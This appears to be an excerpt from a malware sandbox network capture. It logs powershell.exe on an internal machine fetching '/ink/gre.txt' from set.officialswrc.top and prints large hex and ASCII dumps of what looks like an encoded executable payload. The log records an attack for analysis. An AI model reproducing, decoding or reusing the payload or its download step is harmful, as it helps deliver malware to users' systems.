                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 30 59 4d 4e 42 54 54 74 30 41 4c 4e 6b 53 7a 6e 30 4d 4a 4e 37 51 6a 44 7a 30 2f 4d 32 50 44 30 7a 51 38 4d 36 4f 6a 72 7a 67 36 4d 61 4e 54 4e 79 38 76 4d 62 4c 7a 76 79 4d 55 4d 61 48 6a 49 41 41 41 41 59 43 51 41 41 41 77 50 4f 2b 44 61 2f 41 6b 50 72 37 6a 35 2b 45 4a 50 37 79 44 6f 38 73 4a 50 56 79 54 68 38 30 46 50 49 77 7a 41 37 6f 54 4f 35 68 7a 73 34 4d 35 4e 64 66 6a 30 31 55 65 4e 6f 53 6a 65 30 55 57 4d 6f 48 6a 76 41 41 41 41 38 41 41 41 77 44 41 41 41 6b 6a 72 35 41 5a 4f 6e 68 7a 79 34 30 4b 4f 65 65 44 49 33 4d 67 4e 32 62 7a 35 32 4d 73 4e 39 61 7a 6a 32 51 6e 4e 57 5a 44 54 32 55 51 4e 70 58 7a 33 31 55 58 4e 6d 56 54 59 31 77 56 4e 62 55 6a 46 30 4d 4c 4e 59 4d 7a 31 7a 41 38 4d 42 4f 7a 63 7a 30 32 4d 54 4d 6a 44 79 38 76 4d 38 4a 44
                                                                                              Data Ascii: 0YMNBTTt0ALNkSzn0MJN7QjDz0/M2PD0zQ8M6Ojrzg6MaNTNy8vMbLzvyMUMaHjIAAAAYCQAAAwPO+Da/AkPr7j5+EJP7yDo8sJPVyTh80FPIwzA7oTO5hzs4M5Ndfj01UeNoSje0UWMoHjvAAAA8AAAwDAAAkjr5AZOnhzy40KOeeDI3MgN2bz52MsN9azj2QnNWZDT2UQNpXz31UXNmVTY1wVNbUjF0MLNYMz1zA8MBOzcz02MTMjDy8vM8JD
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 41 41 41 41 41 41 41 41 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 2f 42 36 58 4d 41 41 51 2b 67 37 4e 32 54 48 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 6a 32 71 70 39 58 41 41 69 32 65 70 64 55 41 41 51 42 52 42 41 41 41 41 67 2f 68 36 48
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAgACIgACIgACIgACIgACIgACIgACIgACIgACAAAAAAAAEQABEQABEQABEQABEQABEQABEQABEQABEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg/B6XMAAQ+g7N2THIAAAAAAAAAAAAAAAAAAAAAAIj2qp9XAAi2epdUAAQBRBAAAAg/h6H
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 30 55 41 41 41 41 45 41 41 47 4a 4e 42 41 41 41 41 43 6b 78 6b 46 49 43 41 41 78 48 6f 2f 2f 66 2f 49 42 77 52 4d 77 45 41 41 41 41 41 41 59 55 30 51 44 41 41 41 45 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 7a 4c 41 41 41 51 41 41 59 55 30 73 43 41 41 41 49 51 47 54 57 67 49 41 41 45 51 78 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 6a 48 41 41 41 51 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 46 4e
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAYk0UAAAAEAAGJNBAAAACkxkFICAAxHo//f/IBwRMwEAAAAAAYU0QDAAAEAAAAQAAAAAAAAAAAAAAAAA/////DAAAAw/////AAAAAAAAAAAAAAAAAAAAAAgRRzLAAAQAAYU0sCAAAIQGTWgIAAEQxCAAAAAAAAAAAAAAAAgRRjHAAAQAAAAABAAAAAAAAAAAAAAAA8////PAAAAA/////DAAAAAAAAAAAAAAAAAAAAAAGFN
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 31 41 54 4f 47 52 55 52 43 4a 44 4e 32 67 6a 51 7a 4d 7a 51 44 4e 6b 4e 78 67 44 4f 42 4e 45 52 44 4e 6a 4e 35 45 6b 52 47 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 42 44 52 35 41 54 4f 34 67 6a 4e 79 49 54 4e 78 51 6b 51 47 46 7a 4e 77 6b 44 52 31 59 55 4f 42 6c 54 52 31 55 55 4f 47 5a 6b 52 47 5a 30 4e 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 30 4e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: 1ATOGRURCJDN2gjQzMzQDNkNxgDOBNERDNjN5EkRGBDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBDR5ATO4gjNyITNxQkQGFzNwkDR1YUOBlTR1UUOGZkRGZ0NGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZ0NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 74 65 42 38 49 2b 6b 74 2b 47 65 63 64 66 53 75 2b 73 57 6d 59 6c 48 65 30 37 59 69 71 56 6e 77 49 54 6b 6a 4a 6e 57 4b 4a 42 65 49 54 6a 46 64 44 32 43 31 2b 6d 6c 32 56 4b 6c 65 72 2f 62 62 63 57 5a 46 53 2b 31 35 44 38 59 2b 47 76 32 30 58 4f 61 6a 47 42 76 45 42 79 55 64 43 4d 38 4c 41 48 65 58 2b 37 41 6d 46 70 2b 47 6e 56 69 75 61 6c 6b 33 78 4f 36 6a 31 4b 47 52 41 61 53 4e 4c 66 64 78 71 63 4e 2f 50 56 4f 54 6c 55 76 41 32 46 4a 69 4d 33 6d 39 74 61 6e 2b 56 42 43 4d 44 4d 35 53 6a 6a 31 71 73 71 66 52 78 2f 52 6e 72 74 38 4f 72 36 6c 6c 36 63 43 70 44 72 78 46 6c 4e 6c 66 42 64 4b 55 52 52 76 51 51 6a 37 56 30 68 45 62 63 42 58 31 79 59 62 59 37 74 4d 68 51 53 6d 56 42 7a 4a 32 30 53 75 33 49 77 77 73 78 6c 44 71 42 45 30 2f 4e 55 35 69 6f 77 54
                                                                                              Data Ascii: teB8I+kt+GecdfSu+sWmYlHe07YiqVnwITkjJnWKJBeITjFdD2C1+ml2VKler/bbcWZFS+15D8Y+Gv20XOajGBvEByUdCM8LAHeX+7AmFp+GnViualk3xO6j1KGRAaSNLfdxqcN/PVOTlUvA2FJiM3m9tan+VBCMDM5Sjj1qsqfRx/Rnrt8Or6ll6cCpDrxFlNlfBdKURRvQQj7V0hEbcBX1yYbY7tMhQSmVBzJ20Su3IwwsxlDqBE0/NU5iowT
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 38 49 49 51 71 6c 72 37 72 6d 77 50 78 72 46 6d 49 58 71 6a 52 78 37 6b 76 38 72 6d 78 62 6a 6e 2f 45 76 51 61 36 61 71 74 41 4f 76 52 56 4c 46 7a 79 57 70 48 2f 54 38 71 30 4c 77 73 46 44 7a 38 61 5a 78 51 6b 44 52 62 6d 7a 50 78 50 52 41 51 4c 78 57 52 78 37 61 62 32 4f 78 4f 31 37 65 2f 41 2f 2b 6d 39 71 2f 54 76 42 50 41 70 7a 46 6e 55 38 65 53 39 44 38 6a 7a 75 4d 54 48 74 6f 38 41 70 48 63 62 68 34 50 46 33 50 77 7a 73 6b 72 49 33 52 33 7a 44 6d 6d 36 69 53 63 48 6d 43 2f 41 66 74 59 78 57 2b 4a 2b 41 50 52 69 45 65 59 45 54 59 31 38 44 38 65 36 6a 79 47 50 2f 67 38 45 6d 68 2b 75 6b 73 45 2b 2f 50 77 66 59 52 59 55 33 6d 49 7a 4c 6a 52 2b 74 34 78 79 6a 4a 2f 41 50 63 72 6c 53 33 32 37 4e 50 4e 4f 6e 34 6b 57 48 74 6c 39 44 38 5a 42 37 30 56 55 49
                                                                                              Data Ascii: 8IIQqlr7rmwPxrFmIXqjRx7kv8rmxbjn/EvQa6aqtAOvRVLFzyWpH/T8q0LwsFDz8aZxQkDRbmzPxPRAQLxWRx7ab2OxO17e/A/+m9q/TvBPApzFnU8eS9D8jzuMTHto8ApHcbh4PF3PwzskrI3R3zDmm6iScHmC/AftYxW+J+APRiEeYETY18D8e6jyGP/g8Emh+uksE+/PwfYRYU3mIzLjR+t4xyjJ/APcrlS327NPNOn4kWHtl9D8ZB70VUI
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 2f 63 2b 5a 41 44 41 41 41 41 77 50 6e 72 49 51 41 41 41 41 41 38 7a 35 74 43 45 41 41 41 41 41 2f 63 4f 30 41 42 41 41 41 41 77 50 6e 54 50 41 41 41 41 41 41 38 44 36 59 41 41 41 41 41 41 41 2f 67 4f 50 41 43 41 41 41 41 77 50 6f 48 47 67 41 41 41 41 41 38 44 36 48 43 41 41 41 41 41 41 2f 67 4f 72 41 44 41 41 41 41 77 50 6f 50 4e 41 41 41 41 41 41 38 44 36 35 44 4d 41 41 41 41 41 2f 6b 65 49 41 41 41 41 41 41 77 50 70 6a 45 77 41 41 41 41 41 38 54 36 78 42 41 41 41 41 41 41 2f 6b 65 6d 41 43 41 41 41 41 77 50 70 4c 4d 77 41 41 41 41 41 38 54 36 73 44 49 41 41 41 41 41 2f 6f 75 46 41 44 41 41 41 41 77 50 71 48 45 77 41 41 41 41 41 38 6a 36 74 42 41 41 41 41 41 41 2f 6f 65 6d 41 41 41 41 41 41 77 50 71 58 4d 67 41 41 41 41 41 38 6a 36 79 44 49 41 41 41 41
                                                                                              Data Ascii: /c+ZADAAAAwPnrIQAAAAA8z5tCEAAAAA/cO0ABAAAAwPnTPAAAAAA8D6YAAAAAAA/gOPACAAAAwPoHGgAAAAA8D6HCAAAAAA/gOrADAAAAwPoPNAAAAAA8D65DMAAAAA/keIAAAAAAwPpjEwAAAAA8T6xBAAAAAA/kemACAAAAwPpLMwAAAAA8T6sDIAAAAA/ouFADAAAAwPqHEwAAAAA8j6tBAAAAAA/oemAAAAAAwPqXMgAAAAA8j6yDIAAAA
                                                                                              2024-12-19 12:19:33 UTC16384INData Raw: 41 67 45 41 44 42 51 52 59 44 4e 41 41 41 51 53 41 67 45 41 61 42 51 52 59 6a 4d 41 41 41 41 53 41 67 45 41 61 42 51 52 59 44 4d 41 41 41 77 51 41 34 45 41 46 42 51 52 59 7a 4b 41 41 41 67 51 41 77 45 41 4f 42 51 52 59 7a 4a 41 41 41 51 51 41 34 45 41 46 42 51 52 59 54 49 41 41 41 51 56 41 34 45 41 46 42 51 52 59 44 47 41 41 41 51 56 41 34 45 41 46 42 51 52 59 7a 44 41 41 41 51 56 41 34 45 41 46 42 51 52 59 6a 43 41 41 41 41 41 41 41 41 41 7a 42 51 5a 41 51 48 41 68 42 41 64 41 4d 48 41 74 41 41 5a 41 55 47 41 30 42 51 61 41 34 47 41 31 42 41 41 41 41 41 41 74 42 77 62 41 51 47 41 6e 42 67 62 41 6b 47 41 72 42 51 4c 41 51 47 41 6c 42 41 64 41 6b 47 41 75 42 51 64 41 41 41 41 76 42 77 5a 41 45 47 41 69 42 77 62 41 51 48 41 67 41 67 4a 41 41 43 41 6b 42 51
                                                                                              Data Ascii: AgEADBQRYDNAAAQSAgEAaBQRYjMAAAASAgEAaBQRYDMAAAwQA4EAFBQRYzKAAAgQAwEAOBQRYzJAAAQQA4EAFBQRYTIAAAQVA4EAFBQRYDGAAAQVA4EAFBQRYzDAAAQVA4EAFBQRYjCAAAAAAAAAzBQZAQHAhBAdAMHAtAAZAUGA0BQaA4GA1BAAAAAAtBwbAQGAnBgbAkGArBQLAQGAlBAdAkGAuBQdAAAAvBwZAEGAiBwbAQHAgAgJAACAkBQ


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.4497555.182.211.1584437908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 12:20:06 UTC81OUTGET /ink/gre.txt HTTP/1.1
                                                                                              Host: set.officialswrc.top
                                                                                              Connection: Keep-Alive
                                                                                              2024-12-19 12:20:07 UTC424INHTTP/1.1 200 OK
                                                                                              etag: "a0800-676328f6-13f694;;;"
                                                                                              last-modified: Wed, 18 Dec 2024 19:56:38 GMT
                                                                                              content-type: text/plain
                                                                                              content-length: 657408
                                                                                              accept-ranges: bytes
                                                                                              date: Thu, 19 Dec 2024 12:20:06 GMT
                                                                                              server: LiteSpeed
                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                              connection: close
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35 67 66 4f 30 6e 44
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5gfO0nD
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 30 59 4d 4e 42 54 54 74 30 41 4c 4e 6b 53 7a 6e 30 4d 4a 4e 37 51 6a 44 7a 30 2f 4d 32 50 44 30 7a 51 38 4d 36 4f 6a 72 7a 67 36 4d 61 4e 54 4e 79 38 76 4d 62 4c 7a 76 79 4d 55 4d 61 48 6a 49 41 41 41 41 59 43 51 41 41 41 77 50 4f 2b 44 61 2f 41 6b 50 72 37 6a 35 2b 45 4a 50 37 79 44 6f 38 73 4a 50 56 79 54 68 38 30 46 50 49 77 7a 41 37 6f 54 4f 35 68 7a 73 34 4d 35 4e 64 66 6a 30 31 55 65 4e 6f 53 6a 65 30 55 57 4d 6f 48 6a 76 41 41 41 41 38 41 41 41 77 44 41 41 41 6b 6a 72 35 41 5a 4f 6e 68 7a 79 34 30 4b 4f 65 65 44 49 33 4d 67 4e 32 62 7a 35 32 4d 73 4e 39 61 7a 6a 32 51 6e 4e 57 5a 44 54 32 55 51 4e 70 58 7a 33 31 55 58 4e 6d 56 54 59 31 77 56 4e 62 55 6a 46 30 4d 4c 4e 59 4d 7a 31 7a 41 38 4d 42 4f 7a 63 7a 30 32 4d 54 4d 6a 44 79 38 76 4d 38 4a 44
                                                                                              Data Ascii: 0YMNBTTt0ALNkSzn0MJN7QjDz0/M2PD0zQ8M6Ojrzg6MaNTNy8vMbLzvyMUMaHjIAAAAYCQAAAwPO+Da/AkPr7j5+EJP7yDo8sJPVyTh80FPIwzA7oTO5hzs4M5Ndfj01UeNoSje0UWMoHjvAAAA8AAAwDAAAkjr5AZOnhzy40KOeeDI3MgN2bz52MsN9azj2QnNWZDT2UQNpXz31UXNmVTY1wVNbUjF0MLNYMz1zA8MBOzcz02MTMjDy8vM8JD
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 6e 58 65 61 2b 66 6b 52 61 38 2f 70 6d 36 32 2f 48 63 77 30 2f 2f 32 62 2f 2f 2f 33 66 2f 2f 2f 7a 4e 33 72 76 73 6b 53 65 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/nXea+fkRa8/pm62/Hcw0//2b///3f///zN3rvskSeMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 49 67 41 43 41 41 41 41 41 41 41 41 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 42 45 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 2f 42 36 58 4d 41 41 51 2b 67 37 4e 32 54 48 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 6a 32 71 70 39 58 41 41 69 32 65 70 64 55 41 41 51 42 52 42 41 41 41 41 67 2f 68 36 48
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAgACIgACIgACIgACIgACIgACIgACIgACIgACAAAAAAAAEQABEQABEQABEQABEQABEQABEQABEQABEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAg/B6XMAAQ+g7N2THIAAAAAAAAAAAAAAAAAAAAAAIj2qp9XAAi2epdUAAQBRBAAAAg/h6H
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 6b 30 55 41 41 41 41 45 41 41 47 4a 4e 42 41 41 41 41 43 6b 78 6b 46 49 43 41 41 78 48 6f 2f 2f 66 2f 49 42 77 52 4d 77 45 41 41 41 41 41 41 59 55 30 51 44 41 41 41 45 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 77 2f 2f 2f 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 7a 4c 41 41 41 51 41 41 59 55 30 73 43 41 41 41 49 51 47 54 57 67 49 41 41 45 51 78 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 52 52 6a 48 41 41 41 51 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 2f 2f 2f 2f 50 41 41 41 41 41 2f 2f 2f 2f 2f 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 46 4e
                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAYk0UAAAAEAAGJNBAAAACkxkFICAAxHo//f/IBwRMwEAAAAAAYU0QDAAAEAAAAQAAAAAAAAAAAAAAAAA/////DAAAAw/////AAAAAAAAAAAAAAAAAAAAAAgRRzLAAAQAAYU0sCAAAIQGTWgIAAEQxCAAAAAAAAAAAAAAAAgRRjHAAAQAAAAABAAAAAAAAAAAAAAAA8////PAAAAA/////DAAAAAAAAAAAAAAAAAAAAAAGFN
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 31 41 54 4f 47 52 55 52 43 4a 44 4e 32 67 6a 51 7a 4d 7a 51 44 4e 6b 4e 78 67 44 4f 42 4e 45 52 44 4e 6a 4e 35 45 6b 52 47 42 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 42 44 52 35 41 54 4f 34 67 6a 4e 79 49 54 4e 78 51 6b 51 47 46 7a 4e 77 6b 44 52 31 59 55 4f 42 6c 54 52 31 55 55 4f 47 5a 6b 52 47 5a 30 4e 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 6b 52 47 5a 30 4e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                              Data Ascii: 1ATOGRURCJDN2gjQzMzQDNkNxgDOBNERDNjN5EkRGBDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBDR5ATO4gjNyITNxQkQGFzNwkDR1YUOBlTR1UUOGZkRGZ0NGZkRGZkRGZkRGZkRGZkRGZkRGZkRGZ0NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 74 65 42 38 49 2b 6b 74 2b 47 65 63 64 66 53 75 2b 73 57 6d 59 6c 48 65 30 37 59 69 71 56 6e 77 49 54 6b 6a 4a 6e 57 4b 4a 42 65 49 54 6a 46 64 44 32 43 31 2b 6d 6c 32 56 4b 6c 65 72 2f 62 62 63 57 5a 46 53 2b 31 35 44 38 59 2b 47 76 32 30 58 4f 61 6a 47 42 76 45 42 79 55 64 43 4d 38 4c 41 48 65 58 2b 37 41 6d 46 70 2b 47 6e 56 69 75 61 6c 6b 33 78 4f 36 6a 31 4b 47 52 41 61 53 4e 4c 66 64 78 71 63 4e 2f 50 56 4f 54 6c 55 76 41 32 46 4a 69 4d 33 6d 39 74 61 6e 2b 56 42 43 4d 44 4d 35 53 6a 6a 31 71 73 71 66 52 78 2f 52 6e 72 74 38 4f 72 36 6c 6c 36 63 43 70 44 72 78 46 6c 4e 6c 66 42 64 4b 55 52 52 76 51 51 6a 37 56 30 68 45 62 63 42 58 31 79 59 62 59 37 74 4d 68 51 53 6d 56 42 7a 4a 32 30 53 75 33 49 77 77 73 78 6c 44 71 42 45 30 2f 4e 55 35 69 6f 77 54
                                                                                              Data Ascii: teB8I+kt+GecdfSu+sWmYlHe07YiqVnwITkjJnWKJBeITjFdD2C1+ml2VKler/bbcWZFS+15D8Y+Gv20XOajGBvEByUdCM8LAHeX+7AmFp+GnViualk3xO6j1KGRAaSNLfdxqcN/PVOTlUvA2FJiM3m9tan+VBCMDM5Sjj1qsqfRx/Rnrt8Or6ll6cCpDrxFlNlfBdKURRvQQj7V0hEbcBX1yYbY7tMhQSmVBzJ20Su3IwwsxlDqBE0/NU5iowT
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 38 49 49 51 71 6c 72 37 72 6d 77 50 78 72 46 6d 49 58 71 6a 52 78 37 6b 76 38 72 6d 78 62 6a 6e 2f 45 76 51 61 36 61 71 74 41 4f 76 52 56 4c 46 7a 79 57 70 48 2f 54 38 71 30 4c 77 73 46 44 7a 38 61 5a 78 51 6b 44 52 62 6d 7a 50 78 50 52 41 51 4c 78 57 52 78 37 61 62 32 4f 78 4f 31 37 65 2f 41 2f 2b 6d 39 71 2f 54 76 42 50 41 70 7a 46 6e 55 38 65 53 39 44 38 6a 7a 75 4d 54 48 74 6f 38 41 70 48 63 62 68 34 50 46 33 50 77 7a 73 6b 72 49 33 52 33 7a 44 6d 6d 36 69 53 63 48 6d 43 2f 41 66 74 59 78 57 2b 4a 2b 41 50 52 69 45 65 59 45 54 59 31 38 44 38 65 36 6a 79 47 50 2f 67 38 45 6d 68 2b 75 6b 73 45 2b 2f 50 77 66 59 52 59 55 33 6d 49 7a 4c 6a 52 2b 74 34 78 79 6a 4a 2f 41 50 63 72 6c 53 33 32 37 4e 50 4e 4f 6e 34 6b 57 48 74 6c 39 44 38 5a 42 37 30 56 55 49
                                                                                              Data Ascii: 8IIQqlr7rmwPxrFmIXqjRx7kv8rmxbjn/EvQa6aqtAOvRVLFzyWpH/T8q0LwsFDz8aZxQkDRbmzPxPRAQLxWRx7ab2OxO17e/A/+m9q/TvBPApzFnU8eS9D8jzuMTHto8ApHcbh4PF3PwzskrI3R3zDmm6iScHmC/AftYxW+J+APRiEeYETY18D8e6jyGP/g8Emh+uksE+/PwfYRYU3mIzLjR+t4xyjJ/APcrlS327NPNOn4kWHtl9D8ZB70VUI
